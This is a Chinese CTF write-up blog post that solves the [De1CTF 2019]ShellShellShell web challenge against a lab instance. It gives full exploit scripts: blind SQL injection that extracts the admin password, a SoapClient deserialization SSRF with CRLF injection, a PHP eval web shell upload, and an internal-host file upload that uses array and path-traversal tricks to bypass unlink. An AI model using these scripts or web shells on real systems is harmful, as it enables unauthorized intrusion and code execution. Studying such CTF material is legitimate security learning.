刷题[De1CTF 2019]ShellShellShell

最新推荐文章于 2022-08-18 20:12:57 发布
最新推荐文章于 2022-08-18 20:12:57 发布
阅读量2.3k 收藏 2
点赞数 1
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/120691082
版权

关键字:sql注入,反序列化原生类,ssrf,绕过unlink()
这两题缝合出来的,tmd好难
https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540

https://xi4or0uji.github.io/2018/11/06/2018%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9Bweb%E9%A2%98%E8%A7%A3/
在这里插入图片描述一个登录界面,action那输入register还可以注册,这里md5的验证码使用脚本爆破

# -*- coding:utf-8 -*-
import hashlib

for num in range(10000,9999999999):
    res = hashlib.md5(str(num).encode()).hexdigest()
    if res[0:5] == "af1e5": 
        print(str(num)) 
        break

注册一个test用户登陆查看,只有一个publish的功能
在这里插入图片描述可能存在sql注入,但测试没啥反应
Dirsearch扫描目录发现有index.php~文件,是编辑器留下的备份文件

在这里插入图片描述Action的被写死在一个列表里,可以看到还有个phpinfo
把config.php~ user.php~的也看一下
User.php这有个上传但需要admin权限
在这里插入图片描述跟进上半部分这个insert函数,在config.php
在这里插入图片描述

写入的数据会先被get_column函数处理,会被用用反引号包裹起来
在这里插入图片描述关键点其实是在preg_replace那,所有的反引号转换成了单引号,那么就可以进行注入了

在这里插入图片描述使用`)去闭合,注入点在signature位置,最终执行的sql语句如图

在这里插入图片描述

# encoding=utf-8
#python2


import  requests
import string
import time

url = 'http://b3e54b20-f328-4a32-8847-660af06f9e85.node4.buuoj.cn:81/index.php?action=publish'
cookies = {"PHPSESSID": "vama32u1uclof287jhsrguv0q2"}
data = {
	"signature": "",
	"mood": 0
}
table = string.digits + string.lowercase + string.uppercase


def post():
        password = ""
        for i in range(1, 33):
                for j in table:
                    signature = "1`,if(ascii(substr((select password from ctf_users where username=0x61646d696e),%d,1))=%d,sleep(3),0))#"%(i, ord(j))			    #这儿的0x61646d696e是admin的十六进制,当然用`admin`代替也可以
                    data["signature"] = signature
			#print(data)
                    try:
                            re = requests.post(url, cookies = cookies, data = data, timeout = 3)
            #print(re.text)
                    except:
                        password += j
                        print(password)
                        break
        print(password)

def main():
	post()

if __name__ == '__main__':
	main()

密码为jaivypassword
再看到登录这里,要登录admin用户还会检测ip,且是$_SERVER['REMOTE_ADDR']无法伪造,那么只能找一个ssrf的点,进行登录
在这里插入图片描述找到一个反序列化的点可以利用php原生类soapclient反序列化进行ssrf,通过?action=phpinfo看到php开启了soap拓展,这里当不是admin身份的时候进入这个if语句,然后取出第二行的数据进行反序列化

在这里插入图片描述在这里插入图片描述

获取的是本机的ip,然后在对这段内容序列化后使用addslashes进行转义,可以利用mysql在读数据的时候会把括号内的16进制转成原来的字符串的特性绕过这个转义
在这里插入图片描述

生成序列化payload的脚本:

<?php
$target = 'http://127.0.0.1/index.php?action=login';
$post_string = 'username=admin&password=jaivypassword&code=Ixk5iXwrUkJdacRF553V';
$headers = array(
    'X-Forwarded-For: 127.0.0.1',
    'Cookie: PHPSESSID=gkpe4nhjg5dhv2l3kk5o6tglh4'
    );
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      => "aaab"));

$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo bin2hex($aaa);
?>

这里的code还有PHPSESSID需要和我们准备用来登录的一样,从我们的浏览器预先生成一个会话,在本地解决验证码,并将PHPSESSID 与请求以及验证码的解决方案一起发送到验证码(验证码的解决方案与我们的会话相关联)。如果 SSRF 成功,这PHPSESSID将是一个管理员认证的会话。为了防止干扰开两个浏览器,一个打,一个准备登录
将生成的payload,打到sql注入的地方即可
上传那里没有什么阻碍,直接传即可,这里使用脚本自动化操作,https://github.com/rkmylo/ctf-write-ups/blob/master/2018-n1ctf/web/easy-php-540/solve_ssrf_rce.py 拿原题脚本改了下

#python2
import re
import sys
import string
import random
import requests
import subprocess
from itertools import product
import hashlib


_target = 'http://b3e54b20-f328-4a32-8847-660af06f9e85.node4.buuoj.cn:81/'
_action = _target + 'index.php?action='

def get_creds():
    username = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    return username, password

def solve_code(html):
    code = re.search(r'Code\(substr\(md5\(\?\), 0, 5\) === ([0-9a-f]{5})\)', html).group(1)
    for num in range(10000,99999999):
        res = hashlib.md5(str(num).encode()).hexdigest() 
        if res[0:5] == code:  
            print(str(num))
            return str(num)
            break
    

def register(username, password):
    resp = sess.get(_action+'register')
    code = solve_code(resp.text)
    sess.post(_action+'register', data={'username':username,'password':password,'code':code})
    return True

def login(username, password):
    resp = sess.get(_action+'login')
    code = solve_code(resp.text)
    sess.post(_action+'login', data={'username':username,'password':password,'code':code})
    return True

def publish(sig, mood):
    return sess.post(_action+'publish', data={'signature':sig,'mood':mood})#, proxies={'http':'127.0.0.1:8080'})

def get_prc_now():
    # date_default_timezone_set("PRC") is not important
    return subprocess.check_output(['php', '-r', 'date_default_timezone_set("PRC"); echo time();'])

def get_admin_session():
    sess = requests.Session()
    resp = sess.get(_action+'login')
    code = solve_code(resp.text)
    return sess.cookies.get_dict()['PHPSESSID'], code

def brute_filename(prefix, ts, sessid):
    ds = [''.join(i) for i in product(string.digits, repeat=3)]
    ds += [''.join(i) for i in product(string.digits, repeat=2)]
    # find uploaded file in max 1100 requests
    for d in ds:
        f = prefix + ts + d + '.jpg'
        resp = requests.get(_target+'adminpic/'+f, cookies={'PHPSESSID':sessid})
        if resp.status_code == 200:
            return f
    return False

print '[+] creating user session to trigger ssrf'
sess = requests.Session()

username, password = get_creds()

print '[+] register({}, {})'.format(username, password)
register(username, password)

print '[+] login({}, {})'.format(username, password)
login(username, password)

print '[+] user session => ' + sess.cookies.get_dict()['PHPSESSID'] + ' '

print '[+] getting fresh session to be authenticated as admin'
phpsessid, code = get_admin_session()
print code

ssrf = 'http://127.0.0.1/\x0d\x0aContent-Length:0\x0d\x0a\x0d\x0a\x0d\x0aPOST /index.php?action=login HTTP/1.1\x0d\x0aHost: 127.0.0.1\x0d\x0aCookie: PHPSESSID={}\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: {}\x0d\x0a\x0d\x0ausername=admin&password=jaivypassword&code={}\x0d\x0a\x0d\x0aPOST /foo\x0d\x0a'.format(phpsessid, len(code)+43, code)
print ssrf
mood = 'O:10:\"SoapClient\":4:{{s:3:\"uri\";s:{}:\"{}\";s:8:\"location\";s:39:\"http://127.0.0.1/index.php?action=login\";s:15:\"_stream_context\";i:0;s:13:\"_soap_version\";i:1;}}'.format(len(ssrf), ssrf)
mood = '0x'+''.join(map(lambda k: hex(ord(k))[2:].rjust(2, '0'), mood))

payload = 'a`,{})#'.format(mood)

print '[+] final sqli/ssrf payload: ' + payload

print '[+] injecting payload through sqli'
resp = publish(payload, '0')

print '[+] triggering object deserialization -> ssrf'
sess.get(_action+'index')#, proxies={'http':'127.0.0.1:8080'})

print '[+] admin session => ' + phpsessid

# switching to admin session
sess = requests.Session()
sess.cookies = requests.utils.cookiejar_from_dict({'PHPSESSID': phpsessid})

print '[+] uploading stager'
shell = {'pic': ('test.php', '<?php eval($_POST[cmd]);', 'image/jpeg')}
resp = sess.post(_action+'publish', files=shell)#, proxies={'http':'127.0.0.1:8080'})
print(resp.text)
prc_now = get_prc_now()[:-1]  # get epoch immediately

if 'upload success' not in resp.text:
    print '[-] failed to upload shell, check admin session manually'
    sys.exit(0)

在这里插入图片描述

已经上传木马到/upload/test.php了蚁剑连接就行,密码cmd
根据提示在内网,打开虚拟终端,查看网卡信息,找到了内网的ip段,用插件可以扫描端口
在这里插入图片描述

用curl将页面内容保存下来,我这-O没保存成功 直接复制出去保存的

在这里插入图片描述
在这里插入图片描述

对于不是数组的filename进行了一堆严格的限制,但是没有对数组进行限制,所以我们可以考虑用数组进行绕过,要求filename的end和filename的[count-1]不能相等,那么直接传两个就行如:file[1]=111&file[2]=php
在这里插入图片描述在这里插入图片描述

这里保存文件使用的随机文件名,以及最后的unlink删除文件,构造目录穿越的文件名进行绕过/…/shell.php
参考:https://blog.csdn.net/a3320315/article/details/104132751
在这里插入图片描述

利用postman构造phpcurl包
在这里插入图片描述

这里的file那shell.php的内容为

@<?php echo `find /etc -name *flag* -exec cat {} +`;

在这里插入图片描述

hello那的名字要和上传的文件名字一样,不然就访问不到了
在这里插入图片描述

Code那生成代码,但生成的并没有shell.php的内容,需要自己添加,参考赵总的,我这里懒得登录上传直接在蚁剑那新建了一个,保存完直接访问即可

<?php

$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => 'http://10.0.97.6',
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => '',
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 0,
  CURLOPT_FOLLOWLOCATION => true,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => 'POST',
  CURLOPT_POSTFIELDS => "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\nContent-Type: false\r\n\r\n@<?php echo `find /etc -name *flag* -exec cat {} +`;\r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"hello\"\r\n\r\ntest.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[1]\"\r\n\r\n111\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[2]\"\r\n\r\n/../test.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nSubmit\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--",
  CURLOPT_HTTPHEADER => array(
    "Postman-Token: a23f25ff-a221-47ef-9cfc-3ef4bd560c22",
    "cache-control: no-cache",
    "content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
  ),
));

$response = curl_exec($curl);

curl_close($curl);
echo $response;

在这里插入图片描述在这里插入图片描述

当然这里上传文件的步骤也可以在虚拟终端里直接用curl,上传一个shell.php到终端同目录下

@<?php echo `find /etc -name *flag* -exec cat {} +`;

如果使用了-F参数,curl就会以 multipart/form-data
的方式发送POST请求。-F参数以name=value的方式来指定参数内容,如果值是一个文件,则需要以name=@file的方式来指定。

curl 'http://10.0.97.6' -F 'hello=test.php' -F 'file=@shell.php' -F 'file[1]=111' -F 'file[2]=./../test.php'

在这里插入图片描述

Arnoldqqq
关注
[De1CTF 2019]ShellShellShell复现
lllffg的博客
02-18 477
[De1CTF 2019]ShellShellShell 这里是一个md5截断,直接拿脚本跑一下即可 # -*- coding: utf-8 -*- #在python2环境下执行python2 1.py '94d20' 0即可执行 import multiprocessing import hashlib import random import string import sys CHARS = string.letters + string.digits def cmp_md5(substr,
[De1CTF 2019]ShellShellShell
qq_43756333的博客
07-17 1730
平台:buuoj.cn 打开靶机是一个登录框
De1ctf - shell shell shell记录
weixin_30376453的博客
08-08 352
虽然是N1CTF原题,但是自己没遇见过,还是做的题少,记录一下吧== 1.源码泄露,直接可以下到所有源码,然后代码审计到一处insert型注入: 这里直接带入insert里面,跟进去看看 insert函数对values进行正则替换,先调用get_columnsp 这里把数组分成以` , `连接的字符串并且以`反引号包在内,而正则则是匹配字符串中所有反引号之间的内容,将其取...
[De1CTF 2019]ShellShellShell 内网探测&curl 传参传文件
a3320315的博客
02-01 1449
0x01 题目描述 总共分为两部分,都是两道原题~~,我们主要讲一下第二部分,关于第一部分的writeup,以前也写过~~ 第一部分:传送门 第二部分: 我们穿了一句话之后,可以用蚁剑连接,然后就是内网探测了~~ 打开/proc/net/fib_trie,查看内网信息~~ 我们的主机是173.158.29.9,我们用蚁剑自带的端口探测工具扫一下~~ 然后我们使用wget http://173.1...
Linux反弹shell(一)文件描述符与重定向
Hunt Counter
10-24 361
0X00 前言 由于在反弹shell的过程中有一些精简的语句一直没有弄明白,今天特意写文章总结这里面最难的文件描述符和重定向的部分。 0X01 文件描述符 linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard inpu...
[De1CTF2019]xorz
2er0!=O的博客
08-02 1469
[De1CTF2019]xorz 附件: from itertools import * from data import flag,plain key=flag.strip("de1ctf{").strip("}") assert(len(key)<38) salt="WeAreDe1taTeam" ki=cycle(key) si=cycle(salt) cipher = ''.join([hex(ord(p) ^ ord(next(ki)) ^ ord(next(si)))[2:].zfill
BUUCTF [De1CTF2019]cplusplus
weixin_53349587的博客
01-04 642
拿到文件,IDA打开,进入主函数main(): 通过分析,函数第60行为标志性的获取输入函数。 然后在第104行出现了关键函数判断: 其中v47是我们输入的字符串,所以第108行和109行也是关键函数,对我们的输入进行了加密。 先进入104行sub_140005910函数: 函数中有三个sub_140005A90函数,通过动态调试发现,就是将我们输入的字符串每一个都转化为十六进制数。 进入sub_140005A90函数: 因为在关键判断的函数中一共有三个将输入的字符转为16进制的函数...
[De1CTF2019]babyrsa
2er0!=O的博客
07-25 479
[De1CTF2019]babyrsa 附件 import binascii from data import e1,e2,p,q1p,q1q,hint,flag n = [2012961535249176549934011294318831718054876159786130084730582714151046561967053684463455824643923037165883692810306343287024570718035590719428486151090607126535240957
buuctf-[De1CTF 2019]SSRF Me
weixin_43345082的博客
12-30 1078
打开页面就是源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefault...
Bugku-CTF-shell-过狗一句话
kaixinXQ的博客
08-08 421
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 点击题目: 读取PHP下面的文件: print_r(scandir($dir)),还可以利用print_r(glob("*.*")) 访问txt文件:http://114.67.246.176:16100/.
CTFSHOW 套娃shell
羽的博客
04-29 2300
CTFSHOW 套娃shell 1、题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了): GET /?file=/a HTTP/1.1 Host: 127.0.0.1 Connection: close 但是又不是完全是按照这个请求包来的,把host改成其他的,也是可以成功。说明不是完全按照请求头的规则来读取的。 题目里面的正则表达式大概意思就是以/开头,并且后面只能有数字字母和/。 我们需要在服务器上构造一个文件,并且文件内容是可控的,或者是服务器本身就有这样的文件也
shellctf2022-writeup
Todog的博客
08-18 436
CTF
SHELL CTF 2022题目及wp
Laffrey的专栏
08-16 415
https://gitcode.net/rickliuxiao/shellctf2022 SHELLCTF2022 真题及wp。
[*CTF2019]She buuctf
qq_49354488的博客
04-13 904
[*CTF2019]She 下载附件,发现是玩游戏,分析一下文件发现是RPG Maker,我们下载一下RPG Maker XP V1.03 新建进程,吧Game.rxproj放到She下,然后再次打开进程选择She下的Game.rxproj 因为在此之前我们玩过游戏,里面有个鸟打不过,一下子就把我们给秒了,所以我们在这里编辑一下数据库,将敌人的攻击指数改为1 工具 -> 数据库 都改为1 然后我们测试一下游戏,就可以,但是当我们打完鸟,往后走,有个幽灵,我们一碰就Game Over 我们编辑事件,
CTF web总结--利用mysql日志getshell
bob的博客
08-30 3859
在common.php中发现执行sql语句用的多语句执行,所以可以利用多语句执行来getshell. 代码:function my_mysql_query($sql){ global $conn; if($conn->multi_query($sql)){ // do { if ($result = $conn ->store_result()) {
BUUCTF-刷题记录-9
qq_45628145的博客
10-06 2792
MISC [DDCTF2018]第四扩展FS foremost分离出来一个压缩包,密码即为图片详细信息里面的Pactera,对解压出来的文件进行词频分析,得到 DCTF{huanwe1sik4o!} 也就是flag,不过提交居然不对劲,无语无语,百读到了一个wp,居然是这里面的flag,但其实是DDCTF做了一个反作弊的功能,感觉应该是平台负责人上传了自己的附件,然后flag直接用的别人的。 [SUCTF2019]protocol usb的流量包,直接上命令 tshark -r usb.pcapng -T
shell [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列25
重新启程
12-27 760
题目地址:shell 这个题目是高手进阶区的第14题,这一题我没有按照顺序来,耍脾气来!呵呵 看看保护机制 [*] '/ctf/work/python/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled ...
关于BMZCTFshell_exec的解法详解
永远是少年
01-15 1378
在BMZCTF中,有一道题是shell_exec,在尝试做了该题后,又翻看了现有的write-up,发现现有的write-up语焉不详,对于不原理和微操讲解不细,因此写了这篇文章,主要是在前人的基础上对此题进行进一步描述,主要针对刚接触此领域的小白用户,希望能够对他们理解这道题提供帮助。 首先,打开本题,可以看到如下界面: 进行测试,发现输入一个IP地址或者域名后,可以PING测试对应的IP,然后把结果反馈到界面上来。 之后,查看页面源代码(不要问我为什么要查看页面源代码,做CTF题查看页面源代码应该是本
BUUCTF [*CTF2019]otaku
zxnimud5的专栏
09-25 1764
One day,you and your otaku friend went to the comic expo together and he had a car accident right beside you.Before he died,he gave you a USB hard disk which contained this zip.Please find out his last wish. 提示:The txt is GBK encoding. 首先这道题 原题提示了编码是GBK..
[de1ctf 2019]ssrf me 1
最新发布
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值